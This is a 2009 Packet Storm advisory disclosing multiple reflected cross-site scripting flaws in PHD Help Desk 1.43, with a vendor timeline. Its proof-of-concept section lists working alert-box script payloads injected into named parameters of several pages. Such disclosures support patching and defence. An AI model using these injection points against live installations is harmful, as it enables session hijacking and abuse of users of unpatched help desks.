PHD Help Desk 1.43 Cross Site Scripting

2009-11-18T00:00:00
ID PACKETSTORM:82749
Type packetstorm
Reporter Amol Naik
Modified 2009-11-18T00:00:00

Description

                                        
                                            `   
################################################################################  
Mutliple XSS in PHD Help Desk v1.43  
  
Name Multiple vulnerabilities in PHD Help Dsk  
Systems Affected PHD Help Desk v1.43 and possibly earlier versions  
Site http://www.p-hd.com.ar/  
Author Amol Naik (amolnaik4[at]gmail.com)  
Date 16/11/2009  
################################################################################  
  
  
############  
1. OVERVIEW  
############  
  
PHD Help Desk is the software conceived for the registry and follow up of incidents in the Help Desk or Service Desk in your IT area of their company or organization.  
  
###############  
2. DESCRIPTION  
###############  
  
PHD Help Desk is vulnerable to Multiple cross-site scripting instances.  
  
######################  
3. TECHNICAL DETAILS  
######################  
  
Multiple Cross-site Scripting  
++++++++++++++++++++++++++++++  
  
Multiple pages found vulnerable to Cross-site Scripting mainly due to improper use of $_SERVER['PHP_SELF'] and lack of sanitization in user inputs.  
  
++++  
POC  
++++  
  
http://localhost/phd/area.php/'><script>alert("XSS")</script>  
http://localhost/phd/area.php?pagina='><script>alert("XSS")</script>  
http://localhost/phd/area.php?sentido='><script>alert("XSS")</script>  
http://localhost/phd/area.php?q_registros='><script>alert("XSS")</script>  
http://localhost/phd/area.php?orden='><script>alert("XSS")</script>  
http://localhost/phd/solic_display.php?pagina=1&q_registros=><script>alert("XSS")</script>&orden=seq_solicitud_id  
http://localhost/phd/area_list.php/'><script>alert("XSS")</script>  
http://localhost/phd/area_list.php?orden=nombre&sentido=&pagina=1&q_registros=0'><script>alert("XSS")</script>  
http://localhost/phd/atributo.php/'><script>alert("XSS")</script>  
http://localhost/phd/atributo_list.php?pagina=1'><script>alert("XSS")</script>&q_registros=15&orden=activo&sentido=  
http://localhost/phd/atributo_list.php?pagina=1&q_registros=15'><script>alert("XSS")</script>&orden=activo&sentido=  
http://localhost/phd/atributo_list.php?pagina=1&q_registros=15&orden=activo'><script>alert("XSS")</script>&sentido=  
http://localhost/phd/atributo_list.php?pagina=1&q_registros=15&orden=activo&sentido='><script>alert("XSS")</script>  
http://localhost/phd/caso_insert.php/'><script>alert("XSS")</script>  
  
  
Other pages may be vulnerable as well.  
  
  
############  
4. TimeLine  
############  
  
05/11/2009 Bug Discovered  
05/11/2009 Reported to Vendor  
05/11/2009 Vendor agrees to fix this in 2.00 version  
  
Response from Vendor:  
"I forgot to protect the $_GET entries, we are working in the 2.00 version and we will add this sugestion."  
  
16/11/2009 Public Disclosure`